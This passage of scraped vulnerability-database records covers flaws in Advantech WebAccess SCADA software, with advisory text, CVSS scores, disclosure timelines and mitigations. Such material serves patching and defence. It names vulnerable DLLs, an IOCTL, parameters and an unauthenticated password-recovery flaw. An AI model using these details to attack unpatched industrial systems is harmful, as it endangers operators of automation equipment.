"title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Uses freed memory vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-001407" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Resource management error", "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-561" } ], "trust": 0.8 } }
var-201708-1587
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "ZDI", "id": "ZDI-17-563" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-563" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-563", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19442", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "40337bb2-6a96-4a89-9e60-ce211c30c359", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-563", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19442", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "ZDI", "id": "ZDI-17-563" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-563" }, { "db": "CNVD", "id": "CNVD-2017-19442" }, { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-563", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19442", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4079", "trust": 0.7 }, { "db": "IVD", "id": "40337BB2-6A96-4A89-9E60-CE211C30C359", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "ZDI", "id": "ZDI-17-563" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ] }, "id": "VAR-201708-1587", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ] }, "last_update_date": "2022-05-17T02:03:14.224000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-563" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-563/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-563" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359", "ident": null }, { "db": "ZDI", "id": "ZDI-17-563", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19442", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-563", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19442", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-563", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19442", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess RtspVapgDecoderNew2 SetLangStringHex Out of Range Access Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" }, { "db": "CNVD", "id": "CNVD-2017-19442" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Code injection", "sources": [ { "db": "IVD", "id": "40337bb2-6a96-4a89-9e60-ce211c30c359" } ], "trust": 0.2 } }
var-201602-0482
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C75 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0482", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-152", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-152", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C75 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3165", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-152", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "id": "VAR-201602-0482", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:57:43.383000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-152" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-152" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-152" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName strncpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-152" } ], "trust": 0.7 } }
var-201708-1694
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-552", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-552", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4071", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-552", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ] }, "id": "VAR-201708-1694", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:03:14.199000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-552", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-552", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-552", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Hue Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-552" } ], "trust": 0.7 } }
var-202004-0688
Vulnerability from variot
Advantech WebAccess 8.3.4 does not properly restrict an RPC call that allows unauthenticated, remote users to read files. An attacker can use this vulnerability to recover the administrator password. Advantech WebAccess Exists in an inadequate protection of credentials.Information may be obtained. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture of Chinese company Advantech (Advantech). The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automated equipment.
The Advantech WebAccess 8.3.4 version has an access control error vulnerability that originated from the program's failure to properly restrict RPC calls
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202004-0688", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "8.3.4" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "webaccess", "version": "8.3.4" }, { "model": "webaccess", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.3.4" } ], "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-015244" } ] }, "cve": "CVE-2019-3942", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3942", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2019-015244", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-22292", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "39b72fc8-f6a4-4080-90fd-093c362fe043", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "efd64e2f-8a74-497e-9b91-faf9825974a3", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155377", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3942", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2019-015244", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3942", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2019-015244", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-22292", "trust": 0.6, "value": "MEDIUM" }, { "author": 